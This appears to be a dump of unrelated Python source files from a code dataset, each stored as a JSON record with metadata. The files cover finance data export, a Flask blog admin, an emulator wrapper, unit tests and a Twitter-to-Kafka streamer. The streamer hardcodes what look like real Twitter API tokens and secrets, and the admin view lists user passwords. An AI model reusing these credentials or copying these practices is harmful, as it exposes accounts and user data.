fixed_returns.to_excel(writer, sheet_name='fixed_returns')\n    fixed_yields.to_excel(writer, sheet_name='fixed_yields')\n    fixed_spreads.to_excel(writer, sheet_name='fixed_spreads')\n    fixed_durations.to_excel(writer, sheet_name='fixed_durations')\n    alts_returns.to_excel(writer, sheet_name='alts_returns')\n\n# %%\nwith pd.ExcelWriter(r'P:\\\\Advisory\\\\Research\\\\Automation\\\\CMAs\\\\Data\\\\bloomberg_data_nonus.xlsx') as writer:\n    equity_returns_nonus.to_excel(writer, sheet_name='equity_returns')\n    fixed_returns_nonus.to_excel(writer, sheet_name='fixed_returns')\n    fixed_yields_nonus.to_excel(writer, sheet_name='fixed_yields')\n    
fixed_spreads_nonus.to_excel(writer, sheet_name='fixed_spreads')\n fixed_durations_nonus.to_excel(writer, sheet_name='fixed_durations')\n alts_returns_nonus.to_excel(writer, sheet_name='alts_returns')\n historical_cross_currencies.to_excel(writer, sheet_name='currencies')\n\n# %%\nwith pd.ExcelWriter(r'P:\\\\Advisory\\\\Research\\\\Automation\\\\CMAs\\\\Data\\\\term_structure_data.xlsx') as writer:\n aa_corp_spread.to_excel(writer, sheet_name='aa_corp_spread')\n fixed_treasury_yld.to_excel(writer, sheet_name='us_treas_yld')\n fixed_treasury_dur.to_excel(writer, sheet_name='us_treas_dur')\n gl_fixed_treasury_yld.to_excel(writer, sheet_name='gl_treas_yld')\n gl_fixed_treasury_dur.to_excel(writer, sheet_name='gl_treas_dur') \n gl_fixed_agg_yld.to_excel(writer, sheet_name='gl_agg_yld')\n gl_fixed_agg_dur.to_excel(writer, sheet_name='gl_agg_dur')\n gl_fixed_agg_spread.to_excel(writer, sheet_name='gl_agg_spreads')\n em_fixed_treasury_yld.to_excel(writer, sheet_name='em_treas_yld')\n em_fixed_treasury_dur.to_excel(writer, sheet_name='em_treas_dur')\n\n# %%\n","sub_path":".ipynb_checkpoints/data_pull-checkpoint.py","file_name":"data_pull-checkpoint.py","file_ext":"py","file_size_in_byte":19613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"506743515","text":"#-*- coding:utf-8 -*-\nfrom flask import render_template,redirect,request,url_for,flash\nfrom flask_login import current_user,login_required\nfrom . import db\nfrom .models import User,Post,Tag,Say,Link\nfrom flask_admin import Admin,BaseView,expose,AdminIndexView\nfrom flask_admin.contrib.sqla import ModelView\n\n\nadmin=Admin(\n name='My Blog',\n index_view=AdminIndexView(\n template='index.html',\n name=u'Admin',\n url='/admin'\n ))\n\n\nclass MyBaseView(BaseView):\n\t@login_required\n\tdef is_accessible(self):\n\t\treturn current_user.is_authenticated\n\nclass NewPostView(MyBaseView):\n\t@expose('/')\n\tdef new_post(self):\n\t\treturn redirect(url_for('main.new_post'))\n\nclass NewSayView(MyBaseView):\n\t@expose('/')\n\tdef new_say(self):\n\t\treturn redirect(url_for('main.new_say'))\n\nclass NewLinkView(MyBaseView):\n\t@expose('/')\n\tdef new_link(self):\n\t\treturn redirect(url_for('main.new_link'))\n\n\n\nclass MyModelView(ModelView):\n\t@login_required\n\tdef is_accessible(self):\n\t\treturn current_user.is_authenticated\n\nclass UserView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n\t'id':u'序号',\n\t'name':u'名称',\n\t'email':u'电子邮件',\n\t'password':u'密码',\n\t}\n\tcolumn_list=('id','name','email','password')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(UserView,self).__init__(User,session,**kwargs)\n\n\nclass PostView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n 'id':u'序号',\n 'category':u'分类',\n\t'tag_string':u'标签',\n 'title':u'标题',\n 'create_time':u'发布时间',\n\t'view':u'浏览',\n 'brief':u'摘要',\n 'content':u'文章内容'\n }\n\tcolumn_list=('id','category','tag_string','title','create_time','view','brief','content')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(PostView,self).__init__(Post,session,**kwargs)\n\n\nclass SayView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n 'id':u'序号',\n 'create_time':u'发布时间',\n\t'like':u'点赞',\n 'content':u'说说内容'\n }\n\tcolumn_list=('id','create_time','like','content')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(SayView,self).__init__(Say,session,**kwargs)\n\nclass LinkView(MyModelView):\n\tcan_create=False\n\tcolumn_labels={\n 'id':u'序号',\n 'create_time':u'时间',\n 'name':u'名称',\n 'link':u'链接'\n 
}\t\n\tcolumn_list=('id','create_time','name','link')\n\tdef __init__(self,session,**kwargs):\n\t\tsuper(LinkView,self).__init__(Link,session,**kwargs)\n\n\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"361670413","text":"\"\"\"Wrapper for the gtemu emulator\"\"\"\n\nimport itertools\nimport sys\n\nimport _gtemu\n\nassert \"asm\" not in sys.modules, \"gtemu needs to load before anything else touches asm\"\nimport asm # noqa: E402 isort:skip\n\n\nBLANK_RAM = bytearray([0 for _ in range(1 << 15)])\n\n\ndef _make_state_field_accessors(name):\n \"\"\"Return a descriptor that accesses the fields of the state\n\n Just because I don't yet know how to create CFFI structs, so I'm starting with a dict,\n and CFFI seems to do the conversion just fine.\n \"\"\"\n\n def _getter(self):\n state = self._state\n state_is_dict = isinstance(state, dict)\n try:\n return state[name] if state_is_dict else getattr(state, name)\n except KeyError:\n return 0 # Uninitialised.\n\n def _setter(self, value):\n state = self._state\n if isinstance(state, dict):\n state[name] = value\n else:\n setattr(state, name, value)\n\n return property(\n _getter,\n _setter,\n doc=\"Get or set the current state of the \" + name + \" register\",\n )\n\n\nclass Emulator(object):\n def __init__(self):\n self._state = {}\n self._last_pc = None\n self._print = False\n self.breakpoints = set()\n\n def _step(self):\n \"\"\"Run a single step of the interpreter\"\"\"\n # Store the current PC, so that we can return it as next_instruction\n # This is needed because of the pipeline\n self._last_pc = self.PC\n self._state = _gtemu.lib.cpuCycle(self._state)\n if self._print:\n print(self.state)\n\n locals().update(\n {\n field: _make_state_field_accessors(field)\n for field in [\"PC\", \"IR\", \"D\", \"AC\", \"X\", \"Y\", \"OUT\"]\n }\n )\n\n @property\n def next_instruction(self):\n return self._last_pc\n\n @next_instruction.setter\n def next_instruction(self, address):\n \"\"\"Set program execution to proceed from `address`\n\n This sets the PC to address + 1, having loaded the instruction at address,\n as if we had just executed address - 1.\n \"\"\"\n # To start from an address, we need to fill the pipeline with the instruction at address\n # and set PC to address + 1.\n address = asm.symbol(address) or address\n self.PC = address + 1\n self.IR = _gtemu.lib.ROM[address][0]\n self.D = _gtemu.lib.ROM[address][1]\n self._last_pc = address\n\n def run_for(self, instructions):\n \"\"\"Run the emulator for a fixed number of cycles\n\n Will stop at breakpoints if they are hit,\n but always executes at least one cycle\n\n Returns the number of cycles executed.\n \"\"\"\n for i in range(instructions):\n self._step()\n if self._last_pc in self.breakpoints:\n return i + 1\n return instructions\n\n def run_to(self, address, max_instructions=1000):\n \"\"\"Run the emulator until it is about to execute the instruction at `address`\n\n Due to the pipeline, this means that for the previous instruction PC was `address`,\n and therefore we have loaded the instruction.\n\n Will stop at breakpoints if they are hit,\n but always executes at least one cycle\n \"\"\"\n address = asm.symbol(address) or address\n iterator = (\n range(max_instructions)\n if max_instructions is not None\n else itertools.count()\n )\n for i, _ in enumerate(iterator):\n self._step()\n if self._last_pc == address or self._last_pc in 
self.breakpoints:\n                return i + 1\n        raise ValueError(\"Did not hit address in %d instructions\" % (max_instructions,))\n\n    @property\n    def state(self):\n        \"\"\"Return a string representation of the current state\"\"\"\n        registers = [\n            (\"PC\", 2),\n            (\"IR\", 1),\n            (\"D\", 1),\n            (\"AC\", 1),\n            (\"X\", 1),\n            (\"Y\", 1),\n            (\"OUT\", 1),\n        ]\n        heading = \" \".join(\n            [r.rjust(w * 2 + 2) for r, w in registers] + [\"Loaded instruction\"]\n        )\n        separator = \" \".join(\n            [\"-\" * (2 * w + 2) for _, w in registers] + [\"------------------\"]\n        )\n        values = \" \".join(\n            [(\"{:#0%dx}\" % (w * 2 + 2,)).format(getattr(self, r)) for r, w in registers]\n            + [asm.disassemble(self.IR, self.D)]\n        )\n        return \"\\n\".join([heading, separator, values])\n\n    def zero_memory(self):\n        _gtemu.ffi.buffer(RAM)[:] = BLANK_RAM\n        # Needed for bit shuffling\n        _gtemu.ffi.buffer(RAM)[0b1000_0000] = b\"\\x01\"\n\n\nROM = _gtemu.lib.ROM\nRAM = _gtemu.lib.RAM\n\n# On load, populate the ROM from dev.py, and load the labels\n# HACK!\n# dev.py is not expecting to run as a module, and will naturally fail\n# in multiple ways.\n\n# We create a 'Reset' label, and stub out writeRomFiles() to prevent\n# breakage, and set sys.argv to ['dev.py']\n\nasm.label(\"Reset\")  # Creates it at 0x00\n\n\ndef _stub(*args, **kwargs):\n    pass\n\n\n_original_writeRomFiles = asm.writeRomFiles\n_original_enableListing = asm.enableListing\n_original_disableListing = asm.disableListing\n_original_argv = sys.argv\nasm.writeRomFiles = _stub\nasm.enableListing = _stub\nasm.disableListing = _stub\nsys.argv = [\"dev.py\"]\ntry:\n    import dev  # noqa: F401 - Imported for a side effect\nfinally:\n    asm.disableListing = _original_disableListing\n    asm.enableListing = _original_enableListing\n    asm.writeRomFiles = _original_writeRomFiles\n    sys.argv = _original_argv\n\n\ndef gen_rom_data():\n    for opcode, operand in zip(asm._rom0, asm._rom1):\n        yield opcode\n        yield operand\n\n\nrom_data = bytearray(gen_rom_data())\n_gtemu.ffi.buffer(ROM)[0 : len(rom_data)] = rom_data\n\n\n__all__ = [\"Emulator\", \"RAM\", \"ROM\"]\n","sub_path":"Contrib/psr/Forth/tests/gtemu.py","file_name":"gtemu.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"616261268","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef test_log():\n    x = tf.constant([0, 0.5, 1, 5])\n    y = tf.math.log(x)\n    print(y)\n\n\ndef test_reduce_sum():\n    # x has shape (2, 3)\n    x = tf.constant([[1, 1, 1], [1, 1, 1]])\n\n    # No axis given: sum over all elements\n    v = tf.reduce_sum(x).numpy()\n    assert v == 6\n\n    # axis=0: [1, 1, 1] + [1, 1, 1] = [2, 2, 2]\n    v = tf.reduce_sum(x, 0).numpy()\n    assert np.array_equal(v, np.array([2, 2, 2]))\n\n    # axis=1: [1, 1] + [1, 1] + [1, 1] = [3, 3]\n    v = tf.reduce_sum(x, 1).numpy()\n    assert np.array_equal(v, np.array([3, 3]))\n\n    # Keep the reduced dimension\n    v = tf.reduce_sum(x, 1, keepdims=True).numpy()\n    assert np.array_equal(v, np.array([[3], [3]]))\n\n    # Reduce over both dimensions at once\n    # [1,1,1]+[1,1,1]=[2,2,2]\n    # 2+2+2=6\n    v = tf.reduce_sum(x, [0, 1]).numpy()\n    assert v == 6\n","sub_path":"src/tf_test/math_test.py","file_name":"math_test.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"108359901","text":"\"\"\" Write a program that computes the average number of students per class. To\ndo this, ask for the number of classes and the number of students in each class.\nClasses cannot have more than 40 students. 
\"\"\"\nturmas = int(input('How many classes will be entered\\n'))\nnum = 0\nmedia = 0\nwhile num < turmas :\n    alunos = int(input('Enter the number of students enrolled in the class:\\n'))\n    if alunos > 0 and alunos <= 40:\n        media += alunos\n        num = num + 1\n    else:\n        print('Incorrect information')\nmedia = media / turmas\nprint(\"The average number of students per class is: \",media)","sub_path":"ExercicioRepeticao1.py","file_name":"ExercicioRepeticao1.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"480741408","text":"# -*- coding: utf-8 -*-\nimport tweepy\nfrom tweepy.streaming import json\nfrom kafka import KafkaProducer\n\n# Start zookeeper and kafka\n# zookeeper-server-start /usr/local/etc/kafka/zookeeper.properties\n# kafka-server-start /usr/local/etc/kafka/server.properties\n\n# Create the kafka topic\n# kafka-topics --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic tweets\n\n\nproducer = KafkaProducer(bootstrap_servers=\"localhost:9092\")\ntopic_name = \"tweets\"\n\nconsumer_token = \"pMtrIkJf2DwbvvEfjRCvq9yvF\"\nconsumer_secret = \"QAhPzTykUImbW84EjsVqyOWc0RigCtzgQI8BpbQqg1hXb766jI\"\naccess_token = \"4196894355-3R3wcEGy4Bc25rhnTPkOxfCmMbFABmehQy6qScl\"\naccess_secret = \"UqvOEoaIAwR3E67ZBq2L7eaXCcN42c8vLvBXh6u9B4uL3\"\nauth = tweepy.OAuthHandler(consumer_token, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth)\n\n# Set of user ids to listen to\nuser_ids = [\"285532415\", \"147964447\", \"34200559\", \"338960856\", \"200036850\", \"72525490\", \"20510157\", \"99918629\"]\n\n\n# \"Listen\" to tweets and check whether a tweet came from one of the target ids\nclass TweetsStreamListener(tweepy.StreamListener):\n    def on_data(self, raw_data):\n        data = json.loads(raw_data)\n        # check that the user object in the json structure has an id field\n        if \"user\" in data:\n            user_id = data[\"user\"][\"id_str\"]\n            if user_id in user_ids:\n                screen_name = data[\"user\"][\"screen_name\"]\n                print('Time={}\\tID={}\\tscreen_name={}'.format(data[\"created_at\"], user_id, screen_name))\n                producer.send(topic_name, key=screen_name.encode())\n\n\n# Create the listener object\nlistener = TweetsStreamListener()\n# Set up a stream for the Twitter API with the created listener\nstream = tweepy.Stream(auth=api.auth, listener=listener)\n# Start filtering messages\nstream.filter(follow=user_ids)\n","sub_path":"tweets_cnt/tweets-kafka.py","file_name":"tweets-kafka.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"596133441","text":"# coding=utf-8\nfrom mockito import *\nfrom django.test import TestCase\nfrom recipes import mchef, loggers\nimport os\n\n\nclass MIChefTest(TestCase):\n\n    def setUp(self):\n        self.name = \"name\"\n        self.cookbook_url = \"cookbook_url\"\n        msg = mock()\n        when(loggers).set_info_log(msg).thenReturn(None)\n        when(loggers).set_error_log(msg).thenReturn(None)\n        self.chef = mchef.MIChef(self.name, self.cookbook_url)\n\n    def test_update_master_server_no_ok(self):\n        when(os).system(any()).thenReturn(0)\n        result = self.chef.update_master_server()\n        self.assertIsNone(result)\n\n\n    def test_update_master_server_200(self):\n        when(os).system(any()).thenReturn(1)\n        result = self.chef.update_master_server()\n        self.assertIsNotNone(result)\n\n    def test_remove_master_server(self):\n        when(os).system(any()).thenReturn(0)\n        result = self.chef.update_master_server()\n        
self.assertIsNone(result)\n\n def test_remove_master_server_fail(self):\n when(os).system(any()).thenReturn(1)\n result = self.chef.update_master_server()\n self.assertIsNotNone(result)\n\n\nclass MINodeTest(TestCase):\n\n def setUp(self):\n msg = mock()\n when(loggers).set_info_log(msg).thenReturn(None)\n when(loggers).set_error_log(msg).thenReturn(None)\n self.name = \"name\"\n self.chef = mchef.MINode(self.name)\n\n def test_delete_node_client(self):\n when(os).system(any()).thenReturn(0)\n result = self.chef.delete_node_client()\n self.assertIsNone(result)\n\n def test_delete_node_client_no_200(self):\n when(os).system(any()).thenReturn(1)\n result = self.chef.delete_node_client()\n self.assertIsNotNone(result)\n\n def test_add_node_run_list(self):\n software = 'GE_Software'\n when(os).system(any()).thenReturn(0)\n result = self.chef.add_node_run_list(software)\n self.assertIsNone(result)\n\n def test_add_node_run_list_no_200(self):\n software = 'GE_Software'\n when(os).system(any()).thenReturn(1)\n result = self.chef.add_node_run_list(software)\n self.assertIsNotNone(result)\n","sub_path":"recipes/tests/test_chef.py","file_name":"test_chef.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"297944660","text":"import torch\nimport torch.distributed\nimport numpy as np\nimport time\nfrom initialize import init_distributed\nfrom arguments import parse_args, get_args\nfrom model.linear import ColumnParallelLinear\nfrom utils import print_rank_0\nfrom model.cross_entropy import parallel_cross_entropy\nfrom model.mlp import ParallelMLP\n\n\ndef train(hidden_sizes, num_epochs=50):\n \n # Initialize torch.distributed\n init_distributed()\n\n print_rank_0('AutoMP: training MLP...')\n # Use MNIST data\n train_data = np.genfromtxt('data/digitstrain.txt', delimiter=\",\")\n train_X = torch.tensor(train_data[:, :-1], dtype=torch.float, device=torch.cuda.current_device())\n train_Y = torch.tensor(train_data[:, -1], dtype=torch.int64, device=torch.cuda.current_device())\n print_rank_0(f'train_X shape: {train_X.size()}')\n print_rank_0(f'train_Y shape: {train_Y.size()}')\n\n num_features = train_X.size()[1]\n num_classes = 10\n assert num_features == 28*28\n mlp = ParallelMLP(num_features=num_features, num_classes=num_classes, hidden_sizes=hidden_sizes)\n print_rank_0('AutoMP: Successfully initialized ParallelMLP')\n\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(mlp.parameters(), lr=0.01)\n\n # num_epochs = 500\n num_train_samples = train_X.size()[0]\n batch_size = num_train_samples\n tot_time = 0\n for epoch in range(num_epochs):\n start_time = time.time()\n train_loss = 0\n for sample_idx in range(0, num_train_samples, batch_size):\n mini_batch = train_X[sample_idx:sample_idx+batch_size, ...]\n labels = train_Y[sample_idx:sample_idx+batch_size]\n # Forward pass\n logits = mlp(mini_batch)\n # Note: torch.nn.CrossEntropyLoss does not need one hot encoding\n loss = criterion(logits, labels)\n # loss = parallel_cross_entropy(logits, labels)\n train_loss += loss\n # Backward pass\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n train_loss /= (num_train_samples / batch_size)\n # if epoch % 50 == 0:\n print_rank_0(f'Epoch Number {epoch}: train loss: {train_loss}, time: {time.time()-start_time}')\n tot_time += time.time()-start_time\n print_rank_0(f'!!! 
AVG EPOCH TIME: {tot_time/num_epochs}')\n\n\n\n\n\n # output = parallel_linear.forward(train_X)\n # # take a look at this shit\n # print_rank_0(str(output))\n # print_rank_0(str(output.shape))\n #\n #\n # loss = parallel_cross_entropy(output, train_Y)\n # print_rank_0('loss')\n # print_rank_0(str(loss))\n # print_rank_0(str(loss.shape))\n\n\nif __name__ == '__main__':\n # Parse command line arguments\n parse_args()\n\n args = get_args()\n hidden_sizes = args.hidden_sizes\n num_epochs = args.num_epochs\n\n print(hidden_sizes, num_epochs)\n\n train(hidden_sizes, num_epochs=num_epochs)","sub_path":"train_mlp.py","file_name":"train_mlp.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"488194482","text":"from app import db, ma\nfrom models.base import BaseModel, BaseSchema\nfrom marshmallow import fields\n\n\nclass Reaction(db.Model, BaseModel):\n\n __tablename__ = \"reactions\"\n\n name = db.Column(db.String(25), nullable=True)\n\n image = db.Column(db.String(25), nullable=True)\n\nclass ReactionSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Reaction\n load_instance = True\n\n","sub_path":"backend/models/reaction.py","file_name":"reaction.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"53424212","text":"# tuples are a sequence and are immutable (cannot delete or update items)\n\ntup = (\"oranges\", \"apples\", \"bananas\")\n\n# get first item of tuple\ntup[0]\n\n# get first two items of tuple\ntup[0:2]\n\n# can add two tuples together\ntup2 = (12, 14)\ntup + tup2\n\n# delete entire tuple\ndel tup\n\n#length of tuple\nlen(tup2)\n\n#multiply\ntup3 = (\"HA\")\ntup3 * 4","sub_path":"2.8-tuples-data-structure/Tuples.py","file_name":"Tuples.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"428572257","text":"#!/usr/bin/env python\n\nfrom evdev import InputDevice, ecodes, list_devices\nfrom select import select\n\nkeys = \"X^1234567890XXXXqwertzuiopXXXXasdfghjklXXXXXyxcvbnmXXXXXXXXXXXXXXXXXXXXXXX\"\ndev = InputDevice(\"/dev/input/event14\")\n\nbarcode = \"\"\nwhile True:\n r,w,x = select([dev], [], [])\n\n for event in dev.read():\n if event.type == 1 and event.value == 1:\n barcode += (keys[event.code])\n if (len (barcode)) > 13:\n break\n \nprint(\"Barcode:\" + barcode[:-1])","sub_path":"PX_GUI/test_barcode3.py","file_name":"test_barcode3.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"14788853","text":"from data_vk.apivk import *\nimport unittest\n\n\n# my_user_id = 486369485\nfriend_user_id = 5967930\nclass TestVkAPi(unittest.TestCase):\n\n def test_get_dialogs(self):\n dialogs = get_dialogs()\n self.assertIsNotNone(dialogs)\n self.assertTrue(type(dialogs['items']) is list)\n self.assertTrue(type(dialogs['count']) is int)\n print(dialogs)\n\n def test_get_history(self):\n history = get_all_history(friend_user_id)\n print(history)\n","sub_path":"data_vk/apivk_tests.py","file_name":"apivk_tests.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"64095385","text":"import requests\n\nclass Api(object):\n\n def process_item(self, item, spider):\n settings = spider.settings\n apiUrl = 
(settings.get('SCRAPPER_API_URL'))\n\n        if isinstance(apiUrl, str):\n            requests.post(apiUrl, item)\n\n        return item","sub_path":"scrapper/pipeline/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"198947844","text":"\na_list = dict()\n\nclass our_list:\n    def __init__(self):\n\n        print(\"Hello\")\n\n    def add(self, name, age, major, country):\n        a_list[\"name\"] = name\n        a_list[\"age\"] = age\n        a_list[\"Faculty\"] = major\n        a_list[\"country\"] = country\n        return a_list\n\n    def a_remove(self, key):\n        del a_list[key]\n        return a_list\n\n    def a_modify(self, name, major, country):\n        a_list.update({\"name\":name})\n        a_list.update({\"Faculty\": major})\n        a_list.update({\"country\":country})\n        return a_list\n\n    def a_lookup(self, i):\n        # check all keys before concluding the key is absent\n        if i in a_list:\n            return \"found\"\n        return \"not found\"\n\n\nif __name__ == \"__main__\":\n    p = our_list()\n\n    print(p.add(\"Umutoni\", 20, \"CS\", \"Rwanda\"))\n\n    print(p.a_remove(\"Faculty\"))\n\n    print(p.a_modify(\"Liplan\", \"CS\", \"GC\"))\n\n    print(p.a_lookup(\"name\"))\n\n\n\n","sub_path":"question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"422954466","text":"# coding=utf-8\n################################################################################\n#\n# Copyright (c) 2016 eBay Software Foundation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n#################################################################################\n#\n# @Author: Mingkuan Liu\n# @Email: mingkliu@ebay.com\n# @Date: 2016-07-24\n#\n##################################################################################\n\n\n\"\"\"Utilities for extracting and preprocessing training and evaluation data: tokenizing, encoding inputs, etc.\n   The DataSet.tar.gz file in the rawdata folder contains a sample dataset used in a classification task. 
It contains\n three files: TrainPairs, EvalPairs and targetID.\n * The TrainPairs, EvalPairs are training/evaluation corpus data in the\n format of tsv file with columns of SourceSequence, TargetSequence, TargetSeqId.\n * The targetID file contains the whole target sequence space and their IDs in the format of: targetSequence, targetSequenceID.\n\n\"\"\"\n\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n# from builtins import str\nfrom builtins import str\nimport gzip\nimport os\nimport re\nimport tarfile\nimport codecs\nimport random\nimport numpy as np\nimport sys\nimport text_encoder\nimport tokenizer\n\n\nfrom six.moves import urllib\n\nfrom tensorflow.python.platform import gfile\n\n\n\ndef maybe_download(directory, filename, url):\n \"\"\"Download filename from url unless it's already in directory.\"\"\"\n if not os.path.exists(directory):\n print(\"Creating directory %s\" % directory)\n os.mkdir(directory)\n filepath = os.path.join(directory, filename)\n if not os.path.exists(filepath):\n print(\"Downloading %s to %s\" % (url, filepath))\n filepath, _ = urllib.request.urlretrieve(url, filepath)\n statinfo = os.stat(filepath)\n print(\"Succesfully downloaded\", filename, statinfo.st_size, \"bytes\")\n return filepath\n\n\ndef gunzip_file(gz_path, new_path):\n \"\"\"Unzips from gz_path into new_path.\"\"\"\n print(\"Unpacking %s to %s\" % (gz_path, new_path))\n with gzip.open(gz_path, \"rb\") as gz_file:\n with open(new_path, \"wb\") as new_file:\n for line in gz_file:\n new_file.write(line)\n\n\ndef get_data_set(rawDir, processedDir):\n train_path = os.path.join(processedDir, \"Train\")\n dev_path = os.path.join(processedDir, \"Eval\")\n if not (gfile.Exists(train_path +\".target\") and gfile.Exists(train_path +\".source\")):\n corpus_file = os.path.join(rawDir, \"DataSet.tar.gz\")\n if not gfile.Exists(corpus_file):\n print('Error! 
No corups file found at: %s' % corpus_file )\n exit(1)\n print(\"Extracting tar file %s\" % corpus_file)\n #extract out the TrainPairs file\n with tarfile.open(corpus_file, \"r\") as corpus_tar:\n corpus_tar.extractall(processedDir)\n #produce the train corpus file\n with codecs.open( train_path + '.source.Corpus', 'w', 'utf-8' ) as srcFile, \\\n codecs.open(train_path + '.target.Corpus', 'w', 'utf-8') as tgtFile:\n for line in codecs.open( os.path.join(processedDir, 'TrainPairs'), 'r', 'utf-8'):\n info = line.lower().strip().split('\\t') # srcSeq, tgtSeq, tgtId = line.strip().split('\\t')\n if len(info) < 2:\n print('Error train pair data:%s' % line)\n continue\n srcFile.write(info[0] + '\\n')\n tgtFile.write(info[1] + '\\n')\n #produce the eval corpus file\n with codecs.open(dev_path + '.source.Corpus', 'w', 'utf-8') as srcFile, \\\n codecs.open(dev_path + '.target.Corpus', 'w', 'utf-8') as tgtFile:\n for line in codecs.open(os.path.join(processedDir, 'EvalPairs'), 'r', 'utf-8'):\n info = line.lower().strip().split('\\t') # srcSeq, tgtSeq, tgtId = line.strip().split('\\t')\n if len(info) < 2:\n print('Error train pair data:%s' % line)\n continue\n srcFile.write(info[0] + '\\n')\n tgtFile.write(info[1] + '\\n')\n\n return train_path, dev_path\n\n\n\ndef gen_classification_corpus( pairfilename, encodedTargetSpace, encoder, max_seq_length ):\n \"\"\"\n\n :param pairfilename:\n :param encoder:\n :param max_seq_length:\n :return:\n \"\"\"\n Corpus = []\n counter = 0\n for line in codecs.open( pairfilename , \"r\", 'utf-8'):\n info = line.strip().split('\\t')\n if len(info) != 3:\n print(\"File %s has Bad line of training data:\\n %s\" % ( pairfilename, line ) )\n continue\n srcSeq, tgtSeq, tgtId = info\n counter += 1\n if counter % 100000 == 0:\n print(\" reading data line %d\" % counter)\n sys.stdout.flush()\n # verify target sequence correctness\n if tgtId not in set(encodedTargetSpace.keys()):\n print('Error Detected!! trouble in finding targetID in target Space file!! %s' % line)\n continue\n source_tokens = encoder.encode(srcSeq.lower())\n seqlen = len(source_tokens)\n if seqlen > max_seq_length - 1:\n print(\n 'Error Deteced!!! \\n Source Seq:\\n %s \\n Its seq length is:%d, which is longer than MAX_SEQ_LENTH of %d. Try to increase limit!!!!' % (\n srcSeq, seqlen, max_seq_length))\n continue\n source_tokens = source_tokens + [text_encoder.EOS_ID] + [text_encoder.PAD_ID] * (max_seq_length - seqlen - 1)\n Corpus.append( (source_tokens, tgtId ) )\n return Corpus\n\n\ndef get_classification_corpus(processed_data_dir, encoder, max_seq_length):\n \"\"\"\n\n :param processed_data_dir: contains TrainPairs, EvalPairs and targetIDs files\n :param encoder:\n :param max_seq_length:\n :return:\n \"\"\"\n #create Encoded TargetSpace Data\n print(\"Generating classification training corpus .... \")\n encodedFullTargetSpace = {}\n tgtIdNameMap = {}\n encodedFullTargetFile = codecs.open( os.path.join(processed_data_dir, \"encoded.FullTargetSpace\"), 'w', 'utf-8')\n for line in codecs.open( os.path.join(processed_data_dir, \"targetIDs\"), 'r', 'utf-8'):\n tgtSeq, id = line.strip().split('\\t')\n token_ids = encoder.encode(tgtSeq.lower())\n seqlen = len(token_ids)\n if seqlen > max_seq_length-1:\n print( 'Error Deteced!!! \\n Target:\\n %s \\n Its seq length is:%d, which is longer than MAX_SEQ_LENTH of %d. Try to increase limit!!!!' 
